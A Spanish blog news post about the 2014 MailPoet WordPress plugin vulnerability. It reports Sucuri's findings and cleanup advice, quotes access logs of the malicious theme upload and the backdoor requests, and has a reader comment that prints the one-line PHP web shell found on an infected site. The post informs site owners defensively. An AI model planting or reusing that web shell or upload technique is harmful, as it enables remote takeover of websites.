Vulnerabilidad del plugin MailPoet compromete la seguridad de miles de WordPress

wysija mailpoet hacked vulnerability

El causante de la vulnerabilidad de la que hablamos ayer, del ataque masivo de malware a sitios WordPress, se ha descubierto que era el plugin MailPoet, antes conocido como Wysija Newsletter.

En una actualización del blog de Sucuri, sitio especializado en seguridad informática, informan que el plugin MailPoet es la puerta de entrada de los miles de ataques.

Lo peor de todo es que una vez introducido el malware a través de la vulnerabilidad de MailPoet no hace falta que tengas instalado tu mismo el plugin, pues el atacante puede infectar cualquier web, WordPress o no, que comparta servidor con el sitio vulnerable.

Los ataques se inician con el hacker tratando de subir un tema personalizado para MailPoet malicioso al sitio vulnerable:

194.79.195.139 - - [05/Jul/2014:01:41:30 -0700] "POST /wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.0" 302 - "http://site.com.com/wp-admin/admin.php?page=wysija_campaigns&id=1&action=editTemplate" "Mozilla/5.0"

Si consigue subir el tema infectado accede a su puerta trasera desde /wp-content/uploads/wysija/themes/mailp/:

194.79.195.139 - - [05/Jul/2014:01:41:31 -0700] "GET /wp-content/uploads/wysija/themes/mailp/index.php HTTP/1.1" 200 12 "Mozilla/5.0"
194.79.195.139 - - [05/Jul/2014:04:08:16 -0700] "GET /wp-content/uploads/wysija/themes/mailp/index.php?cookie=1 HTTP/1.0" 200 12 "-" "Mozilla/5.0 (Windows)"

Y toma el control total del sitio, ahí es nada.

El número de sitios infectados los últimos días ha sido exponencial …

infecciones mailpoet wordpress

La puerta trasera inyectada crea un usuario con derechos de administración denominado 1001001 que, obviamente, habrá que borrar de la base de datos de WordPress, y también injerta código de puerta trasera en todos los archivos del sistema y de los temas, complicando la limpieza del sitio atacado, que pasa la mayoría de las veces por una reinstalación completa de todos los archivos para asegurarse.

Tontería sería solo actualizar el plugin, porque mantendrías la puerta trasera que permite la infección masiva, sino borrar la carpeta del plugin y luego instalar la última versión, la única que no es vulnerable, actualmente la 2.6.9.

Luego, por precaución, o revisas todos los archivos de tu instalación, o recurres a una copia de seguridad limpia o reinstalas todo.

Una vez estés seguro de tener una instalación limpia te recomiendo encarecidamente que asegures tu instalación de WordPress y, sobre todo, seas exhaustivo con las medidas de prevención ante plugins que podrían suponer un riesgo.

VALORA Y COMPARTE ESTE ARTÍCULO PARA MEJORAR LA CALIDAD DEL BLOG…
(6 votos, promedio: 4.5)

¿Te gustó este artículo? ¡Ni te imaginas lo que te estás perdiendo en YouTube!

AVISO: Esta publicación es de hace 3 años o más. Si es un código o un plugin podría no funcionar en las últimas versiones de WordPress, y si es una noticia podría estar ya obsoleta. Luego no digas que no te hemos avisado.

7 comentarios en “Vulnerabilidad del plugin MailPoet compromete la seguridad de miles de WordPress”

  1. Pingback: Ataque masivo a sitios construidos con Wordpress que mandan Mails y Malware | GeeksRoom

  2. Yo estoy entre los afectados 🙁 Me encontré dentro de la carpeta uploads/wysija un php con 1 línea de código . He preguntado a soporte y me dicen el reestablecer todo para estar seguro, tanto BBDD como files.

    En el post anterior comentabas Fernando que sólo afectaba a los files, no a la BBDD. ¿Es para curarse en salud los de wysija y por eso recomiendan reestablecer la base de datos?

    Sé que no eres soporte, y bastante haces con informar estas cosas. Sólo si sabes algo, te lo agradecería mucho. El reestablecer instalación de WP y plugins y themes lo puedo hacer, pero lo de la BBDD es difícil pues el puñetero archivo infeccioso data del 3 de julio!!

    1. Yo también estoy dentro del grupo de afectados, de hecho hace unas semanas me encontré mi web totalmente caída, me decía que el archivo index.php había sido eliminado. No sé si tendrá relación, pero yo no eliminé en ningún momento, qué locura hacer eso. Hice un volcado de una última copia de seguridad que tenía de toda la FTP, pero ahí sigue el famoso plugin.

      Entonces Fernando, ¿lo desinstalamos a través de la FTP o desde el sistema de plugins? No me queda muy claro, porque si meto todo el contenido de mi FTP de nuevo y este ya está contaminado… ¿o solo por la BBDD? Muchas gracias.

  3. El sistema de comentarios eliminó directamente la línea php que había puesto. Pongo ahora sólo el interior: $_GET[«a»](base64_decode($_GET[«b»]));

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

 

Ir arriba Ir al contenido